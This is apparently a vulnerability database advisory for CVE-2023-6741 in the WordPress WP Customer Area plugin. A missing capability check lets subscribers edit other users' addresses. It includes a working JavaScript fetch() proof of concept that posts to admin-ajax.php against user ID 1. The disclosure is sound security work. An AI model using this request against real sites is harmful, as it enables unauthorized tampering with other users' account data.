WP Customer Area < 8.2.1 – Subscriber+ Account Address Update | CVE 2023-6741 | Plugin Vulnerabilities

Description

The plugin does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address.

Proof of Concept

You may get the nonce from *your* save address form

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": 'action=cuar_save_address_for_owner&cuar_nonce=a73a7eab3b&owner[type]=usr&owner[ids][]=1&address_id=home_address&address[name]=hohohohoh',
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})
.then((response) => {
  return response.text();
})
.then((data) => {
  console.log(data);
});

Affects Plugins

Fixed in 8.2.1

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

9debe1ea-18ad-44c4-8078-68eb66d36c4a

Timeline

Publicly Published

2024-01-10 (about 1 year ago)

Added

2024-01-10 (about 1 year ago)

Last Updated

2024-01-10 (about 1 year ago)

Other

Published

Title

Published

2019-08-09

Title

Woody Ad Snippets < 2.2.6 - Arbitrary Post Deletion

Published

2021-11-29

Title

WP Mail Logging < 1.10.0 - Outdated Redux Framework

Published

2024-06-06

Title

Strong Testimonials < 3.1.13 - Authenticated(Contributor+) Improper Authorization to Views Modification

Published

2021-10-24

Title

Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update

Published

2021-03-27

Title

Easy Form Builder by Bitware <= 1.0 - Unauthorised AJAX calls